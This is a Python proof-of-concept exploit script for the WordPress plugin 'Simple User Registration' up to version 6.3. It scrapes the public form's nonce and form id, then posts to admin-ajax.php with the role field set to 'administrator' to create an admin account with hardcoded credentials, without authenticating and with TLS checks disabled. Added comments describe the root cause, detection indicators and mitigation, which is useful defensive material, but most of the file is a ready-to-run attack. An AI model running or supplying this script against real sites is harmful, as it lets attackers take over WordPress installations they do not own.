import requests
import argparse
import re
from urllib.parse import urljoin

# By: Khaled_alenazi (Nxploited)
#
# Proof of concept for "Simple User Registration <= 6.3" (WordPress plugin,
# see the argparse description at the bottom). The plugin's registration form
# is submitted to WordPress's generic AJAX entry point (wp-admin/admin-ajax.php,
# action=wpr_submit_form), and the account role travels in the POST body as an
# ordinary form field ("wpr[wp_field][role]"). This script sends that field
# set to "administrator" without any prior authentication.
#
# Defender notes (based only on what this script sends and checks):
#   * Root cause, as far as the request shows: the role value appears to be
#     taken from the client; the nonce and form id it also sends are scraped
#     from the public form page, so they do not act as an authorisation check.
#   * Detection: unauthenticated POSTs to admin-ajax.php whose body contains
#     action=wpr_submit_form together with a privileged wpr[wp_field][role]
#     value; administrator accounts whose creation coincides with such a
#     request; the fixed user_login/email values used below are a weak but
#     cheap indicator for this particular PoC.
#   * Mitigation: update the plugin beyond the affected version range, audit
#     roles of accounts created through the registration form, and restrict
#     or disable self-registration where it is not needed.


def extract_form_details(form_page_url):
    """Fetch the registration form page and read the values the form handler expects.

    Args:
        form_page_url: Full URL of the page that renders the plugin's form.

    Returns:
        A ``(nonce, form_id, referer_path)`` tuple of strings, or
        ``(None, None, None)`` when the page does not return HTTP 200, the
        ``wpr_nonce`` / ``wpr_form_id`` hidden inputs are not found, or the
        request raises.
    """
    try:
        # verify=False: TLS certificate validation is disabled for this request.
        response = requests.get(form_page_url, verify=False, timeout=10)
        if response.status_code != 200:
            print(f"[-] Failed to load form page: HTTP {response.status_code}")
            return None, None, None
        # Both values are read out of hidden <input> elements in the public
        # page, i.e. they are available to anyone who can load the page.
        nonce = re.search(r'name=["\']wpr_nonce["\'][^>]*value=["\']([^"\']+)["\']', response.text)
        form_id = re.search(r'name=["\']wpr_form_id["\'][^>]*value=["\'](\d+)["\']', response.text)
        if not nonce or not form_id:
            print("[-] Failed to extract nonce or form_id from page.")
            return None, None, None
        # Everything after "scheme://host", prefixed with "/"; later sent as
        # _wp_http_referer. (The inner split/join is a no-op on the string.)
        referer_path = "/" + "/".join(form_page_url.split("/", 3)[-1].split("/"))
        return nonce.group(1), form_id.group(1), referer_path
    except Exception as e:
        # Broad catch: any network or parsing failure is printed and mapped to
        # "no details" instead of propagating to the caller.
        print(f"[-] Exception while fetching form details: {e}")
        return None, None, None


def Nxploited(base_url, form_url):
    """Submit the plugin's registration form with the role field set to administrator.

    Args:
        base_url: Base WordPress URL; ``wp-admin/admin-ajax.php`` is resolved
            against it with ``urljoin``.
        form_url: URL of the page containing the registration form; passed to
            ``extract_form_details``.

    Returns:
        None. The outcome is only reported on stdout.
    """
    nonce, form_id, referer = extract_form_details(form_url)
    print(f"[i] Extracted Nonce : {nonce}")
    print(f"[i] Extracted Form ID : {form_id}")
    print(f"[i] Referer Path : {referer}")
    if not nonce or not form_id or not referer:
        print("[-] Exploit failed during form extraction.")
        return
    # The handler is reached through WordPress's shared AJAX endpoint, so on
    # the wire the only plugin-specific marker is the "action" body field.
    endpoint = urljoin(base_url, "wp-admin/admin-ajax.php")
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest"
    }
    # Every account attribute, including the role, is client-supplied here.
    # "wpr[wp_field][role]" is the field a server-side allow-list would have to
    # reject; the nonce and form id only show that the form page was loaded.
    data = {
        "action": "wpr_submit_form",
        "wpr_form_id": form_id,
        "wpr_nonce": nonce,
        "_wp_http_referer": referer,
        "wpr[wp_field][user_login]": "Nxploitedadmin",
        "wpr[wp_field][first_name]": "Nxploitedadmin",
        "wpr[wp_field][last_name]": "Nxploitedadmin",
        "wpr[wp_field][user_email]": "test@admin.ksa",
        "wpr[wp_field][password]": "nxp1234",
        "wpr[wp_field][confirm_password]": "nxp1234",
        "wpr[wp_field][role]": "administrator"
    }
    try:
        # verify=False again: certificate validation is disabled for the POST.
        response = requests.post(endpoint, headers=headers, data=data, verify=False, timeout=10)
        print(f"[i] HTTP Response Code : {response.status_code}")
        print(f"[i] Server Response : \n{response.text.strip()[:300]}")
        # Success is inferred from two substrings of the raw body rather than
        # from parsing it; presumably "user_id" appears when an account was
        # created, but the script never reads that id.
        if "success" in response.text and "user_id" in response.text:
            print("\n[+] Exploitation Successful")
            print("[+] Username : Nxploitedadmin")
            print("[+] First Name : Nxploitedadmin")
            print("[+] Last Name : Nxploitedadmin")
            print("[+] Email : test@admin.ksa")
            print("[+] Password : nxp1234")
            print("[+] Role : administrator")
            print("\nExploit By : Khaled_alenazi (Nxploited)")
        else:
            print("[-] Exploit failed.")
    except Exception as e:
        # Same broad-catch pattern as in extract_form_details: report and return.
        print(f"[-] Exception while sending exploit request: {e}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)")
    parser.add_argument("-u", "--url", required=True, help="Base WordPress URL (e.g. http://localhost/wordpress/)")
    parser.add_argument("--form", required=True, help="Full URL of the page that contains the registration form")
    args = parser.parse_args()
    # Silences urllib3's InsecureRequestWarning that verify=False would
    # otherwise print for each request.
    requests.packages.urllib3.disable_warnings()
    Nxploited(args.url, args.form)